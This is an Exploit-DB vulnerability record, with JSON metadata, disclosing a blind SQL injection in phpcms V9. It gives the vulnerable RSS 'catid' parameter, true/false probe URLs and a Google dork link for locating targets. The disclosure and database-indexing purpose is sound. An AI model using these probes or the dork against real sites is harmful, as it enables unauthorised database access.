ID EDB-ID:16027
Type exploitdb
Reporter eidelweiss
Modified 2011-01-22T00:00:00
Description
phpcms 9.0 - Blind SQL Injection Vulnerability. Webapps exploit for php platform
=================================================================
phpcms V9 BLind SQL Injection Vulnerability
=================================================================
Software: phpcms V9
Vendor: www.phpcms.cn
Vuln Type: BLind SQL Injection
Download link: http://www.phpcms.cn/2010/1229/326.html
Author: eidelweiss
contact: eidelweiss[at]windowslive[dot]com
Home: www.eidelweiss.info
Google Dork: http://www.exploit-db.com/ghdb/3676/ // check here ^_^
References:
http://eidelweiss-advisories.blogspot.com/2011/01/phpcms-v9-blind-sql-injection.html
=================================================================
exploit & p0c
[!] index.php?m=content&c=rss&catid=[valid catid]
Example p0c
[!] http://host/index.php?m=content&c=rss&catid=10 <= True
[!] http://host/index.php?m=content&c=rss&catid=-10 <= False
[+] http://host/index.php?m=content&c=rss&catid=5 <= show MySQL Error (table)
=================================================================
Nothing Impossible In This World Even Nobody`s Perfect
=================================================================
=========================| -=[ E0F ]=- |=========================
{"id": "EDB-ID:16027", "hash": "8305ae218992e2763d00d90e6fb7257b", "type": "exploitdb", "bulletinFamily": "exploit", "title": "phpcms 9.0 - Blind SQL Injection Vulnerability", "description": "phpcms 9.0 - Blind SQL Injection Vulnerability. Webapps exploit for php platform", "published": "2011-01-22T00:00:00", "modified": "2011-01-22T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/16027/", "reporter": "eidelweiss", "references": [], "cvelist": [], "lastseen": "2016-02-01T22:58:19", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [], "modified": "2016-02-01T22:58:19"}, "vulnersScore": 7.5}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/16027/", "sourceData": "=================================================================\r\n\tphpcms V9 BLind SQL Injection Vulnerability\r\n=================================================================\r\n\r\nSoftware:\tphpcms V9\r\nVendor:\t\twww.phpcms.cn\r\nVuln Type:\tBLind SQL Injection\r\nDownload link:\thttp://www.phpcms.cn/2010/1229/326.html\r\nAuthor:\t\teidelweiss\r\ncontact:\teidelweiss[at]windowslive[dot]com\r\nHome:\t\twww.eidelweiss.info\r\n\r\nGoogle Dork:\thttp://www.exploit-db.com/ghdb/3676/\t// check here ^_^\r\n\r\nReferences:\r\nhttp://eidelweiss-advisories.blogspot.com/2011/01/phpcms-v9-blind-sql-injection.html\r\n\r\n=================================================================\r\n\r\n\texploit & p0c\r\n\r\n[!]\tindex.php?m=content&c=rss&catid=[valid catid]\r\n\r\n\tExample p0c\r\n\r\n[!]\thttp://host/index.php?m=content&c=rss&catid=10\t<= True\r\n[!]\thttp://host/index.php?m=content&c=rss&catid=-10\t<= False\r\n\r\n[+]\thttp://host/index.php?m=content&c=rss&catid=5\t<= show MySQL Error (table)\r\n\r\n=================================================================\r\n\r\n\tNothing Impossible In This World Even Nobody`s Perfect\r\n\r\n=================================================================\r\n\r\n=========================| -=[ E0F ]=- |=========================\r\n", "osvdbidlist": [], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{}
